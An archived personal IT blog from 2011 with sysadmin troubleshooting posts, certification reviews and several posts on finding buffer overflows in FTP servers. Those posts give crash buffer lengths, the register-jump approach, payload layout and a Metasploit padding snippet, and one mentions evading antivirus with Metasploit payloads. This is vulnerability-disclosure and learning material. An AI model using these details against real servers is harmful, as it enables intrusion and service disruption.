Wednesday, December 21, 2011

Signing off!

Since I'm no longer doing network admin work and am doing full time security work, I'll be migrating my infosec posts to my new blog However, will never die. The 3 to 4 people who read this blog will be happy to know that. Gabe, you don't count.

Hasta Luego!

Monday, October 10, 2011

SharePoint Report Viewer Edit Items Permission

If you run the SharePoint 2010 report viewer web part, you have probably already created a new permission level with limited rights to view the report. However, you may notice that the "Edit Items" permission level is required to render your report. This is obviously a problem because if your users have this permission, they can change the layout of this page, which is bad. What the regular user will see is the "Edit Page" option as a part of the Site Actions menu. This is the problem we're going to solve.

To get around this, you need to go your report library where your report is located. Hit the drop down menu next to your report and you should see "Publish Major Version." As soon as you do this, you can go back to your "Report Viewer" permission level (or whatever name you gave it) and remove the Edit Items level. When you revisit your page you will see that the report will run, and the user can no longer edit the web page.

Tuesday, September 13, 2011

CISSP Review, Strategy and Advice

Today I found out that I am one step closer becoming a CISSP by passing the exam. I realize there are quite a few reviews on this so I'll only add what I think is beneficial.

I put off this certification for years because it isn't that technical and I thought it was going to be boring. I also thought it was just about reading a book and taking an exam; I was wrong. The first mistake I made with this certification in the beginning was that I underestimated the amount of information there was to know. Even if you have worked in the common bodies of knowledge you still have to go through the CISSP's version and terminologies or you wont be ready for the exam.

The biggest piece of advice I can give for the exam is to focus on CONCEPTS. You really need to understand why things are the way they are in the CBK. I went through about 4000 practice questions on but only about 5% of them were like the questions on the exam. I also used all the Shon Harris exam questions that came with the 4th edition of her book. But again, the questions were different on the exam. However, these are great tools to practice what you know. Instead of just memorizing answers, make sure you know WHY the answer is correct. I promise you, this is the best advice I can give.

Use multiple sources of information to study. I read this somewhere else but didn't really start utilizing this strategy until about half way through my studying. The reason this helps is because your brain will process the concepts in two different voices which actually helped me remember things during the exam.

My Study Strategy and Lessons Learned

Here are the resources I used to study:
First bit of advice on strategy: make sure you have one. Don't just start haphazardly reading and studying. Have a plan and try to stick to it, the organization will pay off. If I had to do it differently, here is what I would do: read the official guide first. It's kind of a rough read but anything that doesn't really make sense or isn't clear, you can reinforce with the Shon Harris book. Then, as you begin taking practice tests, review what you know with the Eric Conrad Study Guide. This strategy worked for me and I wish I would have had this written down prior to beginning to study. I didn't really have a solid study process and as I was getting closer to my exam date, I started to panic.

I hated this entire process and the exam was hard but the worst part was probably waiting for your results. I got mine about 4 weeks after I took the exam. This was torture! I do think there is value in the content and I did learn a lot, more than I expected ;)

I hope this helps!

Wednesday, August 31, 2011

SharePoint 2010 Authentication Prompts in Document Library

SharePoint 2010 is an incredible product however, it is a beast. There are so many moving parts and nothing is really "simple." One of the things I recently ran across was a lot of authentication prompts and security warnings when users would open a document in a document library or save to a document library. This totally ruins the user experience. They're already leery of the application and if you make them authenticate all the time, they'll hate you. In addition, you don't want to use the "Remember Password" box because when their password changes, they'll be screwed.

I had a hard time finding a concise solution to solve this problem, so here is what I used and had the best success with:
  1. Add your site to the Trusted Sites Internet Zone.
  2. Go to Internet Options - Security - Highlight the Trusted Sites Check Mark - click on custom level - scroll to the bottom and in the user authentication section select "Automatic logon with current username and password."
  3. This can be done via group policy by going to:  User Configuration - Policies - Administrative Templates - Windows Components - Internet Explorer - Internet Control Panel - Security Page - Trusted Sites Zone. From here find "Logon Options" and enable it. Pick the "Automatic logon with current username and password option."
This will get rid of most of the prompts however, there is one more change you need to make if you're getting prompts when users are saving a new document up to a document library:
  1. The changes are in reference to this KB
  2. You need to adjust the AuthForwardServerList to include your URL. You can use a * if you want. Make sure you use the full URL like https://*
  3. This can also be done via group policy by following this post:
  4. One thing to note from that link that the author does not tell you, you have to modify this GPO registry item so that it is set to CREATE since it is a NEW reg key:

Monday, August 29, 2011

SQL Server Maintenance Plan Execution Failed

No matter what type of SQL Server Maintenance Plan you create and no matter what credentials you use, the plan always fails with "Execution Failed." There is almost no information to go on either. Event logs, SQL Agent logs....nothing is reporting a problem.

Are you using SQL aliases?

Make sure you've set the alias for both the 32bit and 64bit drivers. We ran into this exact problem and as soon as we added the alias to the second section, all the maintenance plans ran fine.

Wednesday, July 20, 2011

FreeFloat FTP Buffer Overflow

The other day on there was a new exploit for FreeFloat FTP 1.0. I took a quick look and decided to see if there were other commands that were vulnerable. I started fuzzing and I noticed quite a few commands were overflowing EIP with 41414141. ABOR, ACCT, ALLO etc etc.... I basically stopped looking because every single command I tried would crash the application.

It seems any unimplemented command caused the same buffer overflow. I posted my exploit on PacketStorm. I also noticed that basically any 4 letters you pretend to be a command....will overflow the buffer. PWND even worked!

If you're interested in buffer overflows or fuzzing, I highly recommend grabbing a copy of this POS software. Who ever coded this did absolutely no checking for user input at all. It really should be used as a learning tool. Everything I found was straight forward overflows. Good fun!

Friday, July 15, 2011

Lync Contact Card Regular Expressions

The contact cards in Lync are a nice feature but is a cause for confusion for some. You may notice that the phone number fields for some of your AD users do not populate or are not populated the same way you've inputted them into Active Directory. The reason is because the Lync server uses a generic set of regular expressions to format them into E.164 format. Why does it do this? A lot of people integrate their phone systems into their Lync server so that you can dial people directly from your computer, by clicking on their phone number. Phone systems need these phone numbers to be in a specific format so they can handle them accordingly.

A client of mine had a situation where multiple hands had been into Active Directory over the years and therefor employees phone numbers were entered in multiple formats. For example:

(111) 222 - 3333
111-222-3333 x44
111-222-3333 x4444
111-222-3333 ex 44

This client did not have an integrated phone system but wanted to utilize the contact card functionality for reference without having to go through their entire AD and re-enter them all. Seems reasonable and easy enough eh? Meh.

Lync Server looks in your share that you setup during installation for address book files. This is typically in \\server\share\1-webservices-1\abfiles in the Company_Phone_Number_Normalization_rules.txt file. This is the file where the regular expressions need to go.

I contacted Microsoft Support (greatest enterprise support known to man) for some help with coming up with a series of regular expressions to help accommodate all of the different variations we could think of. Here is what they came up with and they work perfectly:

## Normalize 10-digit phone number patterns from Active Directory into +E.164
##(?:\+?1[-. ]?)?\(?([0-9]{3})\)?[-. ]?([0-9]{3})[-. ]?([0-9]{4})?\D*(\d*)
##+1($1) $2-$3 $4

#For normal phone numbers with 10 digits

#Various configurations of the 10 digits





#For 10 digit numbers using X as the extension notation (2 digit extensions)

#For 10 digit numbers using X as the extension notation (4 digit extensions)

#For 10 digit numbers using Ex as the extension notation (4 digit extensions)
+1$1$2$3 Ex $4

#For 10 digit numbers using ex as the extension notation (4 digit extensions and case sensitive)
+1$1$2$3 Ex $4


Keep in mind, you'll have to regenerate your Address Book files manually or wait about 24 hours for the new database files to be updated. You also might need to delete your local galcontacts.db files that are located in C:\Users\user\AppData\Local\Microsoft\Communicator\

Hopefully this helps you if you're in the same situation!

Wednesday, July 13, 2011

Solar FTP 2.1.1 PASV Exploit

Let the fuzzing continue.... I found a remote exploit bug in Solar FTP that used the PASV command. Appending a string of about 2127 bytes to the PASV command causes the application to crash. Under certain circumstances remote code execution is possible as well. I worked again with my comrad, Gerardo Galvan and we had it published yesterday

The interesting part about this exploit was the JMP EAX we used took us to some junk before our actual buffer. Fortunately, executing the instructions we landed on did not cause the execution flow to change directions.

We left some work for a future researcher to figure out why the behavior changes when the IP changes. This was a similar problem we had with Golden FTP but it seemed the Solar problem was much more confusing. I couldn't get consistent behavior by changing IP addresses. Hopefully someone can figure this out in the future!

Saturday, June 18, 2011

Server 2008 VMware and ESET Freezing Problem

Literally the day after I posted this, my server locked up again... I will post another update if I get it fixed!
I have been plagued with a very strange issue that I finally found a solution for. I had a Server 2008 R2 VM running Exchange 2007 that would just totally lock up randomly. The only way to get the box back was to do a reset from within the VM client. My client was running ESET Mail Security as the anti virus on the box. When I removed the anti virus the problem went away. This however, is not the final solution :)

It was extremely difficult to troubleshoot this issue since there were no crash logs at all to debug. I was desperately looking for some kind of a pattern to the crashes but I couldn't find anything consistent. There were no indications in the event log of any problems prior to the crash. I began disabling other agents running on the machine, updating VMware tools, installing the latest service packs etc. but nothing fixed it unless I removed ESET.

I found a post talking about a similar issue (with NO mention of ESET) that recommended increasing the Video Ram on the virtual machine. On this particular box, it was set to 8MB, I increased it to 64MB from the VM client. Since doing this, I have not had this box lock up in the last month. I also reinstalled ESET and everything is working perfectly.

What makes this issue even more bizarre is that I ran this particular server with ESET on it for 4 months prior to deployment and even had a few mailboxes running off of it and NEVER experienced the problem. I was fighting this isue on another Exchange box running Server 2008, not R2. I figured I would try a 2008 R2 box since I was literally out of other options. The problem came back after I got all these users over to the new Exchange server. It appears the issue only occurred for me when the Exchange server actually was servicing a number of mailboxes.

Hopefully this post helps someone else having the same problem.

If you're not sure where to do this, just edit the properties of your VM from within the client and modify the Video Card settings you see here. The VM has to be turned off before you can change this value.

Monday, May 16, 2011

AppAssure Replay Review

A complete overview of Replay and its features can be found on their website:

I have been using this product for about 1.5 years and was drawn to it because of the impressive feature set and very competitive price. My opinions with this product have varied greatly in the time I have used it. I have loved it and I have hated it. Prior to this product I have used DoubleTake, Acronis, BackupExec and EMCs product Replistor. I have over 10 years of network administration experience and have used countless products in this arena so I have high standards :)

My requirements for this new backup/dr product were as follows:
  • Offsite Replication
  • Quick and reliable backups
  • The ability to recover entire VMs
  • Mailbox level Exchange and SQL backups
  • Affordable
One of the Replay sales folks got a hold of me at the right time - as I was looking to replace my expensive and cumbersome DR product. They gave a great demo and I was sold.

I started on version 4.3 or 4.4 - I can’t remember. Currently, they are on 4.6. I really want to love this product, but the reality is that I have been burned by it as many times as it has saved my butt. Here is list of the technical issues I've faced over the last 1.5 years:
  • After installing the Replay agent on one box, it now takes 15 minutes to boot up. This is confirmed by safe mode stalling on one of the Replay drivers.
  • A different box consistently blue screened every time the agent was installed. I worked for hours with support to try and resolve this but never got a resolution. We rebuilt the box and that is how it got fixed.
  • Replication would often get corrupted which mean having to re-seed the drive. This is very time consuming considering you have to copy a lot of data to a USB drive and then FedEx it to your DR site.
  • If you want to archive a set of backups by adding a new drive and keeping the old drive... there is no simple way to get back to those archived "recovery points." You have to go through a series of registry hacks to get to them. ARG.
  • There is no replication throttling. This means the product will consume all your bandwidth when it is trying to replicate. All of their competitor products have this feature.
  • On a recent server recovery, I successfully restored a server but when the server booted I was presented with the "black screen of death." Of course this happened at 11PM and I didn’t get a solution until 3AM. Long day. I ended up using a different recovery point which fixed the issue.
  • Replay does not handle big servers very well. I was trying to use it with a 400GB Exchange Server and encountered numerous issues. When the system does its "online roll-ups" the recovery points are totally unavailable which means you cant run restores during this process. This would be a major problem if you were in the situation where you needed to recover quickly. The product should be able to do all its own maintenance in the background so it doesn't disrupt your environment!
  • The console is very slow and crashes. This has been improved in the latest version but it is still buggy.
  • The "console/core" isn’t very compatible with older Replay agents. Meaning, if you upgrade your console/core, you almost always have to update the agents. Updates usually require a reboot.
I will say that the product has consistently gotten better over time but as soon as I start to get excited about the product, I am usually quickly reminded why this is a love hate relationship. 
This company has potential but they have areas that need major improvement:
  • Their support is just bad but getting better. Level 1 folks have managed to help me about 10% of the time and it is mostly just running through troubleshooting steps I have already performed. I often have to escalate to get real answers. In fact, on one of my issues I went all the way to the CEO before I got a response. Nothing personal to any of these folks, they are all very nice and probably understaffed.
  • Their support is slow to respond. More often than not, I have to follow up with them. Everyone should model their support after Microsoft. The sense of ownership and follow up by MS engineers is tremendous.
  • They have spotty 24 hour support. Good luck trying to get them on their "off hours." As a DR product you would think there would be good 24 hour support.
  • Their account support is horrible. It took me 2 months to get a simple answer to a problem with a renewal I had. I sent 15 emails, called and then finally contacted support to have them walk over and get my account person to answer my question. If the product hadn’t been so cheap, I would have dropped them right then and there.
  • Their online knowledge base is horrible. I usually try to hit this before I open a ticket but I think I found 1 solution, the rest had to be called in which = more time.
That is a lot of negative; let me speak to the positives about the product:
  • If you have a smaller Exchange environment, say less than 100GB the Exchange piece is very nice. You can recover emails quickly and usually pain free.
  • They have very competitive pricing to get you in the door.
  • You can export your recovery points to a stand by Virtual Machine. This is incredibly cool and useful. The problem here is that you're obviously limited by your network throughput. If you're trying to export a 200GB server to a VM, be prepared to wait.
  • The replication seems to work nicely in the newest version. If you have plenty of bandwidth the lack of throttling probably doesn't bother you. 
  • The compression and de-duplication are fantastic. Bravo!
  • Your recovery points can be validated, which means the software simulates a mount with the backup to make sure its good. This is a fantastic feature. You get a green check mark to indicate the backup is good. 
  • In the latest release they seem to have fixed the slow console.
Regardless of my heartache with this product I think I will continue to use it. They'll get one more year of me! Since the license renewals are based on list price, they can get expensive but with all the work I've put into this product I need to see if they can continue to improve it. I've never been this patient with a product but I think Replay has a lot of potential; they're just not there yet. They need much better support and need to hire more developers to crank out the bug fixes and feature sets that Replay needs.

****UPDATE**** 11-9-2011
I must say, AppAssure has certainly been attentive to my bitching. They've reached out to me a number of times to resolve and ease my pain. I've personally spoken to their CEO and I am enthused with the future of the product. It sounds like some very cool things are coming out in the 5.0 release. I was also impressed with their dedication to fixing older issues and stability problems. I've noticed more and more stability as we're now running 4.7. They're moving in the right direction...

Tuesday, May 3, 2011

Offensive Security Certified Expert

I will start this post the same way I started my post on the OSCP certification, with a slight modification:

"This was one of the hardest THE HARDEST thing I have ever done in my life both academically and professionally. This course is not for the faint of heart and requires a lot of self discipline, perseverance and a very understanding wife."

The Offensive Security guys recommend taking the "Pentesting with Backtrack" course and successfully completing the OSCP exam challenge before you take the "Cracking the Perimeter" course. After the CTP class, you can take your Offensive Security Certified Expert exam challenge and if you pass, you become an OSCE. The OSCE course and exam challenge are significantly harder than the OSCP.

The OSCE is very different from the OSCP and I never thought I would even attempt the OSCE after the pain I endured from the OSCP. To take the Cracking the Perimeter course you have to pass an initial challenge before they will even take your money to sign up -->

You have to obtain the 16 byte registration key -- sounds simple enough, eh? This is their attempt to weed out the weak! I attempted this challenge one evening, just to see if I could do it. I managed to get the registration key and submit the registration form but now I had a real predicament on my hands. "Do I let the Offensive Security guys torture me again?" The answer was clearly YES, I need more pain.

So the journey begins.

There are some notable differences between this course and the OSCP course:
  1. The lab for the OSCE is not stocked full of vulnerable systems to compromise. In fact, its only a handful of boxes that you use to facilitate the course modules. Based on this, I would say you probably do not need the 60 days like I signed up for. That assumes you can dedicate 30 straight days on the material.
  2. They don't need an elaborate lab for this course because a lot of the material is on exploit development. Meaning, you can hit exploit-db and practice practice practice on your own VMs.
  3. In this course, you will live inside a debugger. You will become so comfortable with HEX and assembly that you will begin dreaming about EB 06. OSCP was about 5% in a debugger, OSCE is about 90%.
65 66 66 20 79 6f 75 20 68 65 78 61 64 65 63 69 6d 61 6c 20 69 20 68 61 74 65 20 79 6f 75!

The material is very interesting and for the most part, still relevant today. There was one module on Anti Virus evasion that is a little dated, however this spawned additional research and I ended up finding a way to make Metasploit payloads 100% undetectable. That is a Metasploit bind shell :) I slightly expanded work that Scriptjunkie did on this subject. This is an example of how the Offensive Security guys opened up my eyes from the course and gave me ideas so I knew what to look for.

The videos and course lab guide are brilliantly put together, just like OSCP. Here is the process I used to learn the material:
  1. I watched all the videos and walked through each exercise in the lab as Muts narrated. Then, I went back and re-did everything on my own.
  2. After I completed the course modules I jumped on exploit-db and started recreating all of the buffer overflow exploits I could find. I would take one, strip out everything in the middle and try to get the same results. I probably recreated 50 exploits. The point of this was to get very familiar inside a debugger and to see first hand some of the obstacles you encounter when writing exploits.
  3. I would revisit the videos and course lab guide as needed.
After my 60 days of lab time it was time to take the exam. I felt like I was ready. After all, I kicked the shit out of the OSCP exam so I was feeling pretty confident about this.

Well, I wasn't ready..... at all. I failed the first exam. I only had 1/3 of the points I needed to pass. The exam is very hard but not impossible. This was the first time I have failed at something in a long time and it was a serious ego check. Not to mention I worked 17 straight hours the first day and another 15 the second day. Part of me wanted to throw the towel in because I had already learned much more than I ever thought possible and I wondered if the cert was really worth it. I thought I had reached my technical limit. That thought didn't last too long. I continued to perfect my skills and took the exam again about 3 weeks later. This time I was ready and passed. What an incredible feeling.

While I was practicing the exploitation techniques they taught me and trying to expand my skills, I managed to find a few software bugs on my own. Most of them are boring DoS, but one was a remote code execution buffer overflow.

I'm not sure I can recommend this course to everyone, it's pretty gnarly but again, brilliantly put together by Offensive Security. They certainly give you the tools to help you succeed, but as usual, they don't tell you everything you need to know. The content in this course is fascinating and if you're a security junkie you will find it thoroughly entertaining. It's too bad this cert doesn't get more notoriety because I have a much better grasp on more things security, much more than I did with OSCP. Two times now the Offensive Security folks have expanded what I thought was possible and it has really helped me in so many areas.

There is so much information to know in the infosec industry and this process taught me something important. To excel at the fastest pace possible in infosec I think you need to be on the edge of going crazy. What I mean is that there is too much to know and the only way to continue learning at an accelerated pace is to be on the edge of too much information. This is a fine line and if you can learn to balance it with your home/family life, you're in good shape, otherwise you'll go nuts.

Thanks again to offsec for making me a little more crazy and at the same time opening my eyes up to the significant issues infosec faces. At least I have a little better idea how to secure my networks and what to watch out for.


Thursday, March 24, 2011

Avaya IP Office Manager 8.1 TFTP DoS

I found a boring DoS in the TFTP server that runs on the IP Office Manager for Avaya phone systems. Nothing exciting, no registers were overwritten and neither was SEH. Here is my exploit:

Monday, March 7, 2011

"Lync is Experiencing Connection Issues with the Exchange Server"

I was receiving this error on only one person's machine. If I used their account on other machines, I would get the same error on the Lync client. It was denoted by a red X in the bottom right of the client. The problem ended up being some sort of corruption in their Exchange email box. I backed up their current mailbox, disabled their current mailbox and then created a brand new mailbox. The error went away after doing this. I was able to recreate the issue by disabling the new mailbox and then reconnecting them to their old box. It was a bit annoying for the user while you're moving mail around but oh well! Dont forget to grab their Exchange Server side rules as well before you blow away the old box, or before the system blows it away for you. I'm not sure how the email box got corrupted, but this was my fix!

I am running Lync Server 2010 and Exchange 2007.

***UPDATE***July 15, 2011***

Based on one of the comments to this post, I did some additional research. The person who posted about the bad character with the contact is yet ANOTHER fix to this issue.

I deleted all the users contacts (they were left in the deleted items). Then I closed Outlook and Lync, then reopened Outlook and then Lync..... the error went away!

I moved the contacts back in blocks of 10-15 at a time trying to isolate the contact and repeating the process of opening and closing the apps. I finally got the error to come back on one of the iterations. I ended up isolating the issue to a single contact and I noticed that there was a strange character at the end of this contacts phone number. It looked like a square or in binary terms, a null byte. As soon as I deleted this "square" I was able to move this contact back and the error did not come back. Then, I moved all the rest of the contacts back in and fortunately, there were no other contacts that had this issue.

I suspect that an easy solution to this for a person who has a lot of contacts would be to export them all to a CSV file then delete the user's contacts. I don't think the special characters would make it to your export so all you would have to do is import them as new contacts. Maybe someone can test this and let the readers know.

Thanks again to the "anonymous" poster for the additional information to spark this investigation!

Tuesday, March 1, 2011

Server 2003 DHCP VLANS and Cisco Aironet Problem

I was adding a Cisco Aironet 1310 to a location that had multiple VLANS all being serviced by a Cisco Router, HP Procurve Switch and Windows Server 2003 DHCP.

I configured the Aironet with two SSID's on different VLANS. The employee VLAN was the "native" VLAN in Aironet speak. The Guest VLAN was the secondary VLAN.

First Problem:  
When connecting to the Guest VLAN, we were getting IP addresses from the first VLAN. It seemed the DHCP server was not able to distinguish between requests from the different VLANS.

Because DHCP is broadcast based, the router naturally segments our broadcast domains as it should so the broadcasts don't reach the other networks. This is typically subverted by adding the "ip helper-address x.x.x.x" on sub interfaces that are not on the same network as the DHCP server. This essentially turns the router into a DHCP relay agent. I have implemented this a 100 times and was stumped as to why this wasn't working.

Looking at the packet captures, I noticed that the initial DHCPDISCOVER packet that the client sends was showing up in multiples of two, but they were slightly different. One of the packets had the source address of the router's sub interface and the destination of the DHCP server, the other packet was a true broadcast packet to the whole subnet. The Problem was that the regular broadcast packet was the one the server was responding to and thus, getting the IP from the employee VLAN every single time, regardless of the VLAN the client was on.

First Solution:
The culprit was that there was a monitor port setup on the HP Procurve switch that was monitoring all the traffic on the port that the router was plugged into and replicating it to the port the DHCP server was plugged into. That's why I was seeing both packets in the capture. As soon as I turned this off, I didn't get the wrong IP on the guest network.... I was getting NO IPS.... the plot thickens....

Second Problem:
While troubleshooting the first issue I setup a DHCP server on the router itself, trying to isolate the issue. I ended up removing the DHCP configuration but in a mistake, I typed the command "no service dhcp." This was the problem. "service dhcp" is also related to the DHCP relay agent functionality on the router. You can read about this command here

Second Solution:
Typing "service dhcp" immediately fixed the issue. The reason I knew there was a problem with the router was because the DHCPDISCOVER packets were hitting the server but the server was ignoring them. The reason was because the router wasn't changing the source IP to the sub interface of the router so the DHCP server didn't know what IP to give it.

Saturday, February 12, 2011

DroidX vs iPhone

Being the "phone tester" for our company has enabled me to try out a number of different phones over the last three years: Motorola Q, Droid, Blackberry Tour, Blackberry Pearl, Droid Incredible, DroidX and iPhone - all on the Verizon network. I was iffy on every phone until I got my hands on the DroidX. What a great phone! My love for the DroidX made me a bit apprehensive moving over to the iPhone. But how could I comment on phones without trying out the market leader?

I will basically keep this commentary between Android/DroidX and iPhone. Blackberry is a dying breed, they need to change something fast or they'll be left in the dust. There is too much functionality in these other little devices that people can not turn down. I realize that corporations have a lot invested in their BES servers but over time, these will go away. I am making a huge assumption that Android and iPhone will embrace the security control that Blackberry Enterprise Server has over everyone else. That is the only thing they have going for them.

There are plenty of articles out there about how great these phones are, I'll just bitch about them:
  • GPS Navigation: The iPhone does not have free turn by turn navigation like Android. This is my favorite feature of Android devices. You can throw away your car GPS if you buy an Android phone because the GPS/Google Maps navigation is that good.
  • Shortcut Menus: The iPhone does not have a "long press" shortcut menu. This is another great Android feature that Apple should incorporate into their phone. It is kind of like the right click in Windows, gives you a quick list of common tasks based on what you hold your finger on. Another shortcut menu I love in the Android devices is the pull down menu from the top. It's a very quick way to respond to different notifications. The iPhone doesn't have anything like this.
  • Voice Recognition: The voice recognition on the iPhone is inferior to Android. With Android, you can speak a text message and it is incredibly accurate. This was a feature I ended up using all the time but have to give up with the iPhone.
  • Email Sub Folder Message Notification: Here is the situation, you use Outlook/Exchange and you have server side rules that shoot emails into specific sub folders based on certain criteria. For example, all emails from "Dan" automatically go to the "Dan" sub folder. The problem comes in when Dan sends you a message....Android and iPhone do not notify you of the new message. This is the only other feature I like in Blackberry devices. I ended up finding an app for Droid called "Touchdown" that replaced the native email client. This app would show all your sub folders in a filtered view so that it appeared you just had one big inbox. When new messages arrived in sub folder's you are notified. This app got around the issue of sub folders. The iPhone doesn't have an app that does this (that I have found). What they do is give you a notification that a new message has arrived and you have to manually browse to the sub folder to get the message. What a pain in the ass.
  • General Interface: I prefer the iPhone over Android. The interface is very sleek and things seem to be very intuitive. This goes for most Apple products I have owned. Add a long press menu and this category goes to Apple hands down. I found the widgets that Android has kind of clunky and not very aesthetic.
  • Message/Missed Call Indicator Light: The iPhone does not have one! I loved being able to look across the room at my DroidX to see if I received an email or had a missed call by that little green light.... the iPhone requires you to manually unlock the phone and look at the home screen. However, you can jailbreak the iPhone and use an app to gain this functionality.
  • Stability: The DroidX required occasional reboots due to system lock ups. The iPhone has not done this to me yet...
  • Market vs App Store: For the most part, if there is an Apple app, there is an Android app (except of course for my Touchdown app!). From a security perspective, it seems Apple does a little better job vetting the apps that are approved for download. The Android market is like the wild west, anything goes so you may be buying a farting app that is also stealing your email in the background.
I'm really on the fence with these two devices even though it sounds like I'm bashing the iPhone. There is something about the iPhone that is sexy and draws you in. A few months with the iPhone might help but that DroidX was pretty nice!


Back to the DroidX. The gmail/gtalk integration is so much better and I missed too many little things about this phone. I think it's official, I'm an Android dork.

Tuesday, February 1, 2011

Lync Server 2010 Application Sharing Error: "Sharing failed to connect due to network issues"

I hit another small bump in the road with Lync Server 2010. IM was working in the test environment but I was unable to do any application sharing or screen sharing with folks. I found out from Microsoft that this is a peer to peer connection... I assumed everything was proxied through the server so was focusing on the ports on that server.

I had a Group Policy firewall rule that allowed the old R2 communicator client in/out the firewall and forgot to update it with the new client file location. Instead of a rule allowing "c:\program files\Microsoft Office Communicator\communicator.exe" - I added one to allow "c:\program files\Microsoft Lync\communicator.exe"

After a gpupdate /force on the server and a gpupdate /force on my client machines, it worked.

Monday, January 24, 2011

The Lync Server Front-End service terminated with service-specific error %%-2146762487

I installed a fresh copy of Lync Server 2010 Standard and got all the way through the install without a problem.....but none of the services would start. I was getting this error:

The Lync Server Front-End service terminated with service-specific error %%-2146762487.
Warning: Cannot start service RTCPDPCORE on computer **************.
This problem in my situation was because I was using an internal certificate authority. My certificate was just fine and was correctly applied to the server, but I forgot to import my internal CA chain into the server as a trusted root certification authority. As soon as I did this the services started right up.

Sunday, January 23, 2011

Golden FTP 4.70 PASS Remote Exploit

I've been fuzzing ALOT of FTP servers lately. I found a PASS buffer overflow in the Golden FTP 4.70 server and recently had it published to exploit-db.

At first I thought this was just a DOS but then a collegue of mine, Gerardo Iglesias Galvan took a closer look and saw that EIP was being overwritten as well as ESI and ECX. We noticed strange behavior when different buffer lengths were used. By adding some NOPS + shellcode + extrapadding NOPS + EIP, we could control execution flow. We're utilizing a JMP ESI for the EIP address.

Here is where it got confusing. Our exploit was unreliable. My collegue was testing the one I developed his test environment and it wasn't working. I tested his exploit and it would not work on my network. We also had the offsec guys try but they couldn't reproduce it either. If I was a reverse engineer, I probably could have just figured out why this was happening, but I am not :) I noticed that if the subnet the FTP server was running on changed, the exploit would fail. It seems the offsets were changing with different subnets. I went through and manually figured out the offset for 4 different subnets. They were all just slightly different. I'm still not sure why the app does this, maybe someone can let me know?

Also, for this exploit to work, the option "show new connections" HAS to be set in the application. You can find this under the Options button in Golden FTP. It should also be noted that failed exploit attempts usually DOS the service. I didn't test if this works with the paid version or not, all my testing was done on the free version.


@bannedit ported our exploit to Metasploit yesterday. His version is certainly much more elegant than the one we did. He managed to figure out how to make it reliable with this little piece of code here:

if datastore['RHOST'].length < 15
            pad = make_nops(1) * (15 - datastore['RHOST'].length)

The IP address is 15 bytes long, including the dots. IE = 13 bytes so 15 -13 = 2 more nops. We did all the work for him but failed to see the pattern! Oh well, at least it is in the framework now!

Sunday, January 16, 2011

mount: unknown filesystem type 'HPFS/NTFS'

I ran into this error when I tried to set my external hard drive to automatically mount to the same mount point on every reboot. First, I went into the disk utility in Ubuntu and got the file system type which was HPFS/NTFS. I got my UUID and entered this line into my fstab file:
UUID=b3a0378a-c352-47fe-ac88-cf2a9d815e13 /media/Backup  HPFS/NTFS defaults 0 0

Then, I ran mount -a to  remount everything in my fstab file but ran into this error:
mount: unknown filesystem type 'HPFS/NTFS'

I couldn't find a solution anywhere on the Internet but then remembered I set this drive to the ext4 file system when I formatted it. I changed my fstab file to reflect that:
UUID=b3a0378a-c352-47fe-ac88-cf2a9d815e13 /media/Backup ext4 defaults 0 0

After re-running mount -a everything worked.

Friday, January 14, 2011

Blackmoon FTP 3.1 Denial of Service Exploit

I found an exploit and had it published to exploit-db. It is a denial of service for the Blackmoon FTP 3.1 Server (Builds 1735 and 1736). The PORT command is not properly sanitized and sending a buffer of 600 bytes crashes the application.

When the Blackmoon FTP Server is installed it sets the Blackmoon FTP Service to automatically restart the service in the event of a failure. This was a little confusing because I could see the application crash, but the FTP service would still respond to my requests. Turning the service recovery feature off enabled me to find the DOS. Because EIP or SEH is not overwritten it's not likely to be anything other than a nuisance.

I contacted the vendor and they fixed the issue within a few weeks. Build 1737 is the latest build that incorporates their fix.